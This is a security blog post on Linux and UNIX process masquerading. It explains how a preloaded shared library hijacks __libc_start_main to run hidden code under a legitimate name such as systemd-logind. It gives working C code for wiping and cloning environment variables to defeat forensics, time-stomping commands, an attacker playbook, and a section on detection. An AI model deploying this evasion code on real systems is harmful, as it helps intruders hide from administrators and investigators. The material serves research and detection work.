Hiding in plain sight (part 2) - Abusing the dynamic linker

A stealthy process stomping method compatible with UNIX-like systems with anti-forensic enhancements for Linux.

SolarOS (a play on SunOS which would become Solaris) featured in the Disney movie Tron Legacy.

Introduction

This post details a defence evasion technique that overcomes a pitfall on Solaris and the BSDs, discussed in part 1. The technique is extended to Linux with additional anti-forensic behaviours to provide additional stealth, such as removing evidence of LD_PRELOAD. Detection opportunities are discussed. The final product can be found here.

In part 1 of the "Hiding in plain sight" series, we looked at a common defence evasion technique: dynamically changing a process name for the purpose of "process stomping" or "process masquerading". In Linux, it is trivial to overwrite the argument vector and change the process's internal thread name with the prctl system call. The outcome is that tools such as ps show a process name different from that of the initial executable. In the other UNIX-like systems we looked at, there is no equivalent of prctl that can modify the thread name. Utilities such as ps or top will therefore show a tampered argv[0], but the (truncated) filename of the running process (comm) remains, and the masquerading fails.

$ ./main &

$ ps -ef -ocomm,args | grep stomped
main    stomped (main)

argv modified, although comm can't be changed (FreeBSD)
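
For contrast, on Linux the comm value can be rewritten from inside the process. The following is a minimal sketch rather than the code from part 1; the helper names set_comm and read_comm are made up for illustration, and it assumes it is called from the main thread, since /proc/self/comm reports the name of the thread group leader.

```c
#include <stdio.h>
#include <string.h>
#include <sys/prctl.h>

/* Set the calling thread's name (what ps shows as comm). Linux only.
 * The kernel keeps at most 15 bytes plus the terminating NUL. */
int set_comm(const char *name)
{
    return prctl(PR_SET_NAME, (unsigned long)name, 0, 0, 0);
}

/* Read the name back from /proc/self/comm, without the trailing newline.
 * Returns 0 on success, -1 on failure. */
int read_comm(char *buf, size_t len)
{
    FILE *f = fopen("/proc/self/comm", "r");

    if (f == NULL)
        return -1;
    if (fgets(buf, (int)len, f) == NULL) {
        fclose(f);
        return -1;
    }
    fclose(f);
    buf[strcspn(buf, "\n")] = '\0';
    return 0;
}
```

Calling set_comm("stomped") and then read_comm should hand back the new name, which is exactly the step that has no counterpart on the other systems.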

The technique described next has been observed in use by threat actors to overcome this limitation on systems such as Solaris by "borrowing" both argv[0] and comm from a common process, hijacking main() through the use of LD_PRELOAD. If we apply the method in Linux and take advantage of the ability to also tamper with the environment variables, this becomes quite a stealthy technique. Consider the following:

  • The process name inherits that of another legitimate executable: both /proc/[pid]/comm and /proc/[pid]/cmdline
  • The symbolic link /proc/[pid]/exe reflects that of the legitimate binary
    • This symbolic link can't trivially be changed and is often a very valuable artefact used to detect process masquerading. Not in this case.
  • The environment variable key LD_PRELOAD is removed
    • Additionally, inherited environment variables from the parent process (e.g. bash) are zeroed out and replaced, hindering memory acquisition.
  • No ptrace system call for process injection

In regards to detecting this technique - a reliable method is telemetry on system calls: despite removing the LD_PRELOAD string from the process memory, the envp argument in the execve system call will have an occurrence of LD_PRELOAD. Additionally, if the malicious shared object is a 'known bad', /proc/[pid]/maps will reveal it.

The playbook

First let's take a look at how this all looks, then we will dig into the theory.

A common process on the compromised system is chosen. Let's go with systemd-logind. The threat actor runs the following sequence of commands:

$ LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libm.so.5 /lib/systemd/systemd-logind &
$ disown $!
$ systemctl restart systemd-logind
$ exit

An overworked administrator (with a very keen eye) logs in to do a routine health check. They note that there are two instances of systemd-logind, but nothing else appears out of place. Regardless, they dig in a little further.

 $ ps  -eo pid,ppid,tty,comm,cmd | grep systemd-login
   1818       1 ?        systemd-logind  /lib/systemd/systemd-logind
   1917       1 ?        systemd-logind  /lib/systemd/systemd-logind   

Check environment variables between the two:

$ paste -d'\t' <(strings /proc/1917/environ) <(strings /proc/1637/environ)

LANG=en_US.UTF-8        LANG=en_US.UTF-8
PATH=/usr/local/sbin    PATH=/usr/local/sbin
WATCHDOG_PID=1917       WATCHDOG_PID=1917
JOURNAL_STREAM=8        JOURNAL_STREAM=8
SYSTEMD_EXEC_PID=1917   SYSTEMD_EXEC_PID=1917
...

Double checking, they are the same:

$ diff /proc/1917/environ /proc/1637/environ
$

How about the executable file? Also the same:

$ readlink /proc/1917/exe
/usr/lib/systemd/systemd-logind

$ readlink /proc/1637/exe
/usr/lib/systemd/systemd-logind

Are they the same thing? How about the mapped memory?

$ diff <(cat /proc/1637/maps | awk '{print $6}' | sort -u) <(cat /proc/1917/maps | awk '{print $6}' | sort -u)
 
21d20
< /usr/lib/x86_64-linux-gnu/libm.so.5
22a22
> /usr/lib/x86_64-linux-gnu/libnss_systemd.so.2

So they have a slight difference in what shared libraries are loaded. Which one is the malicious one?

$ ls -al  /usr/lib/x86_64-linux-gnu/ | egrep "libm.so|libnss_systemd"
-rw-r--r--  1 root root      140 Apr 30 17:07 libm.so
-rwxr-xr-x  1 root root    16496 Apr 30 17:07 libm.so.5
-rw-r--r--  1 root root   907784 Apr 30 17:07 libm.so.6
-rw-r--r--  1 root root   325904 Jun 16 05:44 libnss_systemd.so.2

The answer is the one with the birth time of the date this blog page was published:

$ stat /usr/lib/x86_64-linux-gnu/libm.so.5
  ...
Access: 2024-08-02 01:55:18.613844475 -0400
Modify: 2024-04-30 17:07:28.000000000 -0400
Change: 2024-08-02 01:54:32.521378007 -0400
 Birth: 2024-08-02 01:50:19.050898356 -0400

The malicious library was time stomped, with the mtime cloned from another shared object file in the same directory.

$ touch -r ./libm.so.6 ./libm.so.5

As always, never rely on the (default) timestamp from ls.

Here libm.so.5 was loaded by the process with the PID 1818. In our example, the real systemd-logind had a higher pid of 1917. Normally this would be a lower value as it's a systemd service that is started on bootup... but did you note the sneaky restart systemd-logind command thrown in?

💡
As I was reviewing this post, it became apparent that there is one artefact that emerges (with the env vars) when systemd-logind is masqueraded in this manner that indicates something is very off. Can you spot it?

And to double check, there is no LD_PRELOAD environment variable in any process, nor does ld.so.preload exist (a common technique with userspace rootkits):

$ ps eaux | cat | grep LD_PRELOAD  | grep -v grep
$

$  ls /etc/ld.so.preload
ls: cannot access '/etc/ld.so.preload': No such file or directory

One final check, dumping the virtual memory of the stack:

$ cat /proc/2183/maps | grep stack
7ffcc6620000-7ffcc6641000 rw-p 00000000 00:00 0                          [stack]

$ gdb --pid 2183
(gdb) dump memory /tmp/stack.dump 0x7ffcc6620000 0x7ffcc6641000

We would expect to see LD_PRELOAD and the inherited environment variables from the parent shell that would indicate the process was invoked from an interactive session - commonly used for forensic analysis, such as SSH_CLIENT, MAIL, TERM etc. But here, nothing of the sort:

$ strings /tmp/stack.dump | egrep "LD_PRELOAD|TERM|SSH_CLIENT|MAIL"
$
💡
If you're playing along at home on an interactive desktop (e.g. X session), rather than an SSH connection / terminal over the network, you may note the parent PID is different: thanks to systemd, disown will reparent the process to systemd --user and not /sbin/init. Thanks again, systemd, for continuing to spoil things.

LD_PRELOAD

The job of the dynamic (run-time) linker is to figure out what libraries need to be loaded and to link them into the executable at run time. It resolves symbols (such as function names) in shared libraries and performs the necessary relocations (e.g. "this function is at this address"). The environment variable LD_PRELOAD tells the dynamic linker to load a shared object of our choosing before any other library. If that shared object exports a function with the same name as one that already exists elsewhere, the LD_PRELOAD version takes preference. This also applies to "constructor" directives with gcc and clang. Abuse of LD_PRELOAD is an age-old technique employed in user space rootkits, often to backdoor libc functions, and is particularly easy to detect.

The objective of using LD_PRELOAD in the context of the technique discussed here is to replace the user-defined main function of a legitimate program with malicious code at run time, in order to inherit the legitimate program's attributes such as its process name.

Two ways to achieve this in a shared library are:

  • Decorate the new main with the directive __attribute__((constructor))
  • Hook into __libc_start_main to replace the function pointer to the original main with a new one, or alternatively, replace the init parameter.
💡
By convention, the following examples use the function name premain to mean the malicious code that replaces the original main.

The start_main approach

This method works in Linux: hook into __libc_start_main and then transfer control to premain. The first argument to __libc_start_main is a function pointer to main, so here it can simply be swapped with premain.

int __libc_start_main(
  main, argc, argv,
  init, fini, rtld_fini,
  stack_end
);

The alternative is to set the fourth argument, init, to the address of premain. As we will understand better in the next section, the difference is that with init hijacked, no other constructors or initialization routines (such as setting up the auxiliary vector) will run, which might be a consideration.

In order to hook into __libc_start_main, its address is obtained by calling dlsym with the first argument, handle, set to RTLD_NEXT. The 'real' __libc_start_main is then called, passing on every argument untouched except for the main address (or alternatively, init):

int premain(int argc, char **argv, char **envp) {
    ...
}

int __libc_start_main(int (*main)(int, char **, char **), .. ) {
    
    typeof(&__libc_start_main) orig = dlsym(RTLD_NEXT, "__libc_start_main");
    return orig(premain, argc, argv, init, ...);
}

Our final example code will use this approach.

The "constructor" approach

The second method should work on both Linux and other UNIX-like systems such as Solaris and FreeBSD. A function in the shared library can be decorated with a directive that makes it execute when the library is loaded, before control is transferred to the main of the program. A final call to exit is used to avoid the eventual transfer of control to the real main.

#include <stdio.h>
#include <stdlib.h>

__attribute__((constructor()))
void premain() {
    printf("In premain()\n");
    exit(0);   /* never return, so the real main is not reached */
}

The rest of this section can be skimmed over unless the details are of interest to you.

A diagram to help illustrate what is happening (on recent gcc / glibc). The exit() suppresses control flow back to the real main.

The internals of how constructors are implemented depend on the versions of gcc and glibc. If you are researching this topic and your ELF files look or behave differently from what is documented, it is probably because the information is outdated and does not apply to your toolchain. On the latest gcc versions, the list of function pointers to constructors is stored in the .init_array section. In recent glibc versions, the function call_init is responsible for enumerating and executing each constructor.

ELF files will still contain the .init section (_init), although this is an older initialization mechanism and is probably not used. A quick look at some differences follows. In the examples below, this program has been compiled and executed:

#include <stdio.h>

__attribute__((constructor()))
void premain() {
  printf("in premain()\n");
  return;
}

int main() {
  return 0;
}

Breaking on premain and doing a backtrace in gdb on gcc 11.4.0, ldd (glibc 2.35) on Ubuntu 22.04 (trimmed for brevity):

(gdb) bt
#0  premain () at main.c:5
#1  0x00007ffff7daeebb in call_init .... at ../csu/libc-start.c:145
#2  __libc_start_main_impl ... at ../csu/libc-start.c:379
#3  0x0000555555555085 in _start ()

The same backtrace in gdb on gcc 4.1.2, ldd (GNU libc) 2.5 on RHEL 5.4:

(gdb) bt
#0  premain () at test.c:5
#1  0x0000000000400576 in __do_global_ctors_aux ()
#2  0x0000000000400383 in _init ()
#3  0x0000000000000001 in ?? ()
#4  0x00000000004004f7 in __libc_csu_init ()
#5  0x00000035b5a1d92e in __libc_start_main () from /lib64/libc.so.6
#6  0x00000000004003e9 in _start ()
💡
Why the difference?

glibc 2.33 and earlier used __libc_csu_init, which was statically linked into the executable. As a result a ROP technique, "return-to-csu", was discovered, and the mitigation was to move this functionality out of the executable and into glibc, in call_init.

What is relevant in this discussion is how backwards compatibility is maintained with this change and how it could be leveraged. If we look at the commit comment for this change:

For maximum backwards compatibility, this is not changed, and instead, the main map is consulted from __libc_start_main if the init function argument is a NULL pointer.

In other words, on binaries built with a newer toolchain, the init parameter in __libc_start_main will be NULL, so the constructor loading routine inside glibc is chosen, which will find the constructor list in the .init_array section. Here we can see in the disassembly at the entry point _start that gcc has emitted xor ecx, ecx, a NULL for the init argument:

If the init parameter is not NULL, it's dealing with an older compiled binary, so it will fall back to the statically compiled __libc_csu_init. The disassembly of _start on the older gcc 4.2:

__libc_csu_init then makes its way to __do_global_ctors_aux, which walks through the constructors found in the (now deprecated) .ctors section.

💡
When there is more than one constructor, priorities that dictate the order of execution can be assigned by passing in an integer value between 101 and 65535, with 101 being the highest priority (e.g. constructor(101)). The dynamic linker gives precedence to any decorated constructor in a library loaded with LD_PRELOAD and executes it before all others, even if its priority value is explicitly the lowest. For that reason, we really do not need to consider the priority argument.
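
The priority ordering within a single object can be seen with a small sketch like the one below. It only illustrates the numeric priorities on gcc and clang; it does not demonstrate the LD_PRELOAD precedence, which needs a separate shared object. The names ctor_order, ctor_count and the three functions are made up for this example.

```c
/* Records the order in which the constructors below ran. */
int ctor_order[3];
int ctor_count;

/* Declared first, but runs second because 102 is a lower priority than 101. */
__attribute__((constructor(102)))
void ctor_second(void) { ctor_order[ctor_count++] = 102; }

/* Highest priority allowed for user code: runs first. */
__attribute__((constructor(101)))
void ctor_first(void) { ctor_order[ctor_count++] = 101; }

/* No explicit priority: runs after the prioritized constructors. */
__attribute__((constructor))
void ctor_last(void) { ctor_order[ctor_count++] = 0; }
```

By the time main is entered, ctor_order holds 101, 102 and 0 in that order, regardless of the order in which the functions appear in the source.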

Tampering with the environment variables

But the biggest giveaway is that the string LD_PRELOAD will appear as an environment variable for the process:

$ cat /proc/6797/environ  | tr '\0' '\n'
LD_PRELOAD=./bad.so
SHELL=/bin/bash
COLORTERM=truecolor
...

And with the appropriate ps flags:

$ ps e -ww -p 6797
    PID TTY      STAT   TIME COMMAND
   6797 ?        S      0:00 /sbin/auditd LD_PRELOAD=./bad.so SHELL=/bin/bash COLORTERM=truecolor ...

glibc offers two functions that manipulate the environment variables although, contrary to their names, they do not achieve what we are after: neither unsetenv("LD_PRELOAD") nor clearenv() works as expected here.

These standard library functions work on a global variable environ, defined in posix/environ.c, a pointer to an array of character pointers:

char **__environ = NULL;
weak_alias (__environ, environ)

It is assigned in __libc_init_first:

__libc_init_first (int argc, char **argv, char **envp) {
   ...
   __libc_argc = argc;
   __libc_argv = argv;
   __environ = envp;
   ...
}

As we see in stdlib/setenv.c, clearenv() sets this to NULL:

/* Clear the environment pointer removes the whole environment.  */
__environ = NULL;

Setting this to NULL just changes the value of the pointer environ, an initialized global variable within the process's data segment. The environment variables will appear cleared from the perspective of any glibc function called from the process that touches environ, but what is wanted is for other processes to "see the same" thing.

Utilities such as ps read from /proc/[pid]/environ, which exposes the process's virtual memory as laid out when the process was created (or as later modified with prctl). For the environment variables, this is specifically the pages of memory between mm->env_start and mm->env_end, as seen in the kernel implementation of environ_read():

static ssize_t environ_read(struct file *file, ...)
{
    ...
    struct mm_struct *mm = file->private_data;
    ...
	env_start = mm->env_start;
	env_end = mm->env_end;
    ...
        this_len = env_end - (env_start + src);
        retval = access_remote_vm(mm, (env_start + src), page, this_len, FOLL_ANON);
    ...

/fs/proc/base.c

So unsetenv() will have no effect on anything that reads from /proc/[pid]/environ such as ps.
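
The split between libc's view and the kernel's view can be observed from inside a process. The sketch below is illustrative only; the helper name proc_environ_has is made up, and it assumes a Linux /proc. It walks the NUL-separated entries of /proc/self/environ looking for a key.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

/* Returns 1 if /proc/self/environ holds an entry "key=...", 0 if it does
 * not, and -1 if the file cannot be opened. Entries are NUL-separated. */
int proc_environ_has(const char *key)
{
    FILE *f = fopen("/proc/self/environ", "r");
    char *entry = NULL;
    size_t cap = 0, klen = strlen(key);
    int found = 0;

    if (f == NULL)
        return -1;
    /* getdelim with '\0' as delimiter yields one KEY=value entry per call. */
    while (getdelim(&entry, &cap, '\0', f) != -1) {
        if (strncmp(entry, key, klen) == 0 && entry[klen] == '=') {
            found = 1;
            break;
        }
    }
    free(entry);
    fclose(f);
    return found;
}
```

A variable added at run time with setenv is visible to getenv but not to proc_environ_has, because libc stores it outside the env_start/env_end region. The same mismatch, in the other direction, is why unsetenv leaves LD_PRELOAD visible to ps.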

So what are our options?

  • Overwrite the bytes in the region where the environment variables are stored. Here it could be new values or NULL values.
  • Call prctl with PR_SET_MM_ENV_START / PR_SET_MM_ENV_END, with a new address range

The first option, overwriting the existing memory, is ideal as it removes artifacts that would otherwise remain in the process's stack when memory acquisition is done. The second option, prctl, is ideal if the environment variable list may grow and we don't want to risk corrupting the stack. On Linux we do both. On other platforms, where the equivalent of prctl is not available, we just overwrite the space in the stack.

If we just call prctl and don't overwrite the memory, the data is still resident and can be acquired:

$ cat /proc/2183/maps | grep stack
7ffd71f32000-7ffd71f53000 rw-p 00000000 00:00 0                          [stack]

$ gdb --pid 2183
(gdb) dump memory /tmp/stack.dump 0x7ffd71f32000 0x7ffd71f53000

$ strings /tmp/stack.dump | egrep "LD_PRELOAD|SSH_CLIENT"
LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libm.so.5
SSH_CLIENT=192.168.56.1 62336 22

Reimplementing "clearenv"

Here we need to determine the start and end addresses and overwrite everything in between with NUL bytes. glibc provides the pointer environ, which can be accessed as a global variable with extern char **environ.

💡
As the environment variables are placed after the arguments in the stack, the environment vector can alternatively be reached through &argv[argc+1]; its first element points to the start of the strings.
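
As a small illustration of that layout (a sketch with a made-up helper name, envp_from_argv, assuming the usual System V style initial stack where the argument pointers, a NULL terminator and the environment pointers sit back to back):

```c
#include <stddef.h>

/* On the initial process stack the argument vector is followed by a NULL
 * terminator and then the environment vector, so the environment vector
 * begins at &argv[argc + 1]. Its first element, if any, points at the
 * first "KEY=value" string. */
char **envp_from_argv(int argc, char **argv)
{
    return &argv[argc + 1];
}
```

This only holds for the argc and argv originally handed to the program, before anything has rewritten or relocated them.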

We have the start address. To calculate the end address, the size of each string pointed to by each element in env can be determined with strlen. Summing the length of each string (including the terminating \0) gives us the end address. bzero is then called to overwrite every byte:

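void clearenv2() {
    size_t len = 0;
    char **env = environ;
    if (env == NULL || *env == NULL)
        return;               /* nothing to wipe */
    while (*env)
        len += strlen(*env++) + 1;
    bzero(*environ, len);     /* strings are contiguous on the stack */
}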

The following diagram taken from part 1 in this series may serve as a helpful visualization:


Putting it all together, so far we have:

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
#include <string.h>

extern char **environ;

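void clearenv2() {
    size_t len = 0;
    char **env = environ;
    if (env == NULL || *env == NULL)
        return;               /* nothing to wipe */
    while (*env)
        len += strlen(*env++) + 1;
    bzero(*environ, len);     /* strings are contiguous on the stack */
}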

int hook(int argc,char**argv, char**envp) {
  printf("in hook().. sleeping...\n");
  sleep(100);
  return 0;
}

int __libc_start_main(
    int (*main)(int, char **, char **),
    int argc,
    char **argv,
    int (*init)(int, char **, char **),
    void (*fini)(void),
    void (*rtld_fini)(void),
    void *stack_end)
{

    clearenv2();

    typeof(&__libc_start_main) orig = dlsym(RTLD_NEXT, "__libc_start_main");
    return orig(hook, argc, argv, init, fini, rtld_fini, stack_end);
}

$ gcc main.c -o bad.so -fpic -shared
$ LD_PRELOAD=./bad.so /lib/systemd/systemd-logind  &
[1] 7597
$ in hook().. sleeping...
  
$  cat /proc/7597/environ 
 
$ ps e -ww -p 7597
    PID TTY      STAT   TIME COMMAND
   7597 pts/1    S      0:00 /lib/systemd/systemd-logind

An improvement

As an improvement, we could take the environment variables of the real systemd-logind and copy them over the existing ones rather than wiping them out. Here caution would be needed not to exceed the allocated space. If the running process did not have root privileges, calling prctl with PR_SET_MM_MAP would be required (as described in part 1). To keep things simple, let's assume the user is root.

Our clone_env reads /proc/[pid]/environ. Since "files" in /proc do not report a file size, we do not know how much memory to allocate for the process's environment variables; one approach is to realloc until read returns EOF. This is the approach that ps and other utilities in the procps package use. prctl(PR_SET_MM, PR_SET_MM_ENV_{START|END}, ...) is then called, passing in the start and end addresses of the buffer storing the copied environment variables:

void clone_env(pid_t pid) {
    ...
    snprintf(path, sizeof(path),"/proc/%d/environ", pid);
    fd = open(path,O_RDONLY,0);
    ...
    envl = 0;
    while ((n = read(fd,buf, sizeof(buf))) > 0) {
      rbuf = realloc(rbuf, envl + n);
      ...
      memcpy(rbuf+envl, buf, n);
      envl += n;
    }

    prctl(PR_SET_MM, PR_SET_MM_ENV_START, rbuf, 0,0);
    prctl(PR_SET_MM, PR_SET_MM_ENV_END, rbuf+envl, 0,0);
}
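
The read-until-EOF loop elided above can be written out in full. This is a sketch of the general pattern, not the code from the final product; the helper name read_all and the 4096-byte chunk size are arbitrary choices for illustration.

```c
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Read a whole file of unknown size (such as /proc/<pid>/environ) into a
 * heap buffer. Returns the buffer and stores its length in *len, or
 * returns NULL on error. The caller frees the result. */
char *read_all(const char *path, size_t *len)
{
    char chunk[4096], *out, *tmp;
    size_t total = 0;
    ssize_t n;
    int fd = open(path, O_RDONLY);

    if (fd < 0)
        return NULL;
    out = malloc(1);              /* so an empty file still yields a buffer */
    if (out == NULL) {
        close(fd);
        return NULL;
    }
    while ((n = read(fd, chunk, sizeof(chunk))) > 0) {
        tmp = realloc(out, total + (size_t)n);
        if (tmp == NULL) {
            free(out);
            close(fd);
            return NULL;
        }
        out = tmp;
        memcpy(out + total, chunk, (size_t)n);
        total += (size_t)n;
    }
    close(fd);
    if (n < 0) {                  /* read error, not EOF */
        free(out);
        return NULL;
    }
    *len = total;
    return out;
}
```

Keeping the realloc result in a temporary avoids leaking the old buffer when the allocation fails, which the abbreviated loop glosses over.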

Obtaining the pid to pass into clone_env is rather straightforward: enumerate each process in /proc and return the first one with a matching comm string (skipping the entry for the current process):

pid_t getpidbycomm(const char *comm) {
  ...
  pid_t me = getpid();

  dir = opendir("/proc");
  ...
  while((ent = readdir(dir)) != NULL) {
    cpid = atoi(ent->d_name);
    if (!cpid || cpid == me)
      continue;

    snprintf(path,sizeof(path), "/proc/%d/comm", cpid);
    fd = open(path, O_RDONLY, 0);
    if (fd < 0)
      continue;               // process exited or is not readable
    n = read(fd,buf, sizeof(buf));
    close(fd);
    if (n <= 0)
      continue;
    buf[n-1] = '\0'; // rtrim \n
    if (strcmp(comm, buf) == 0) {
      closedir(dir);
      return cpid;
    }
  }
  ...
}

Bringing it all together, the basename of the program being run is taken from argv[0] to be matched in getpidbycomm:

int __libc_start_main(..) {
  clearenv2();
  char *name = basename(argv[0]);
  pid_t p = getpidbycomm(name);
  clone_env(p);
    ...
  }

You can find the final product 'procscope.c' here.

Detection

If there is the possibility to capture system calls then the envp argument will contain the LD_PRELOAD string. Here bpftrace is used:

$  bpftrace -e 'tracepoint:syscalls:sys_enter_execve {
    printf("%d %s ", tid, str(args->argv[0]));
    join(args->envp);
 }'
Attaching 1 probe...

63227 /usr/libexec/ibus-portal LD_PRELOAD=./main.so SHELL=/bin/bash <CUT>

Osquery, Falco and the common EDRs that work in the kernel will certainly detect this. Paths of shared libraries can be enumerated with lsof and matched against known-bad indicators (filenames, hashes). In the absence of these capabilities, detection may rely on other behaviour of the malicious code (network connectivity, file activity, open sockets etc).
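
Where lsof is not at hand, the same check can be made directly against /proc/[pid]/maps, much like the awk pipeline used in the playbook. The following is a rough sketch under that assumption; the helper name maps_has_path is made up, and the known-bad path passed to it would come from your own indicators.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 if any mapping in /proc/<pid>/maps has a pathname containing
 * needle, 0 if none does, and -1 if the file cannot be read. */
int maps_has_path(pid_t pid, const char *needle)
{
    char file[64], line[4352];
    FILE *f;
    int found = 0;

    snprintf(file, sizeof(file), "/proc/%d/maps", (int)pid);
    f = fopen(file, "r");
    if (f == NULL)
        return -1;
    while (!found && fgets(line, sizeof(line), f) != NULL) {
        /* Fields: address perms offset dev inode pathname */
        const char *p = line;
        int field;

        for (field = 0; field < 5; field++) {
            p += strcspn(p, " ");   /* skip the field itself */
            p += strspn(p, " ");    /* skip the spaces after it */
        }
        if (strstr(p, needle) != NULL)
            found = 1;
    }
    fclose(f);
    return found;
}
```

For the playbook above, maps_has_path(1818, "libm.so.5") would be the kind of call that flags the masquerading process, provided the path or filename is already known to be bad.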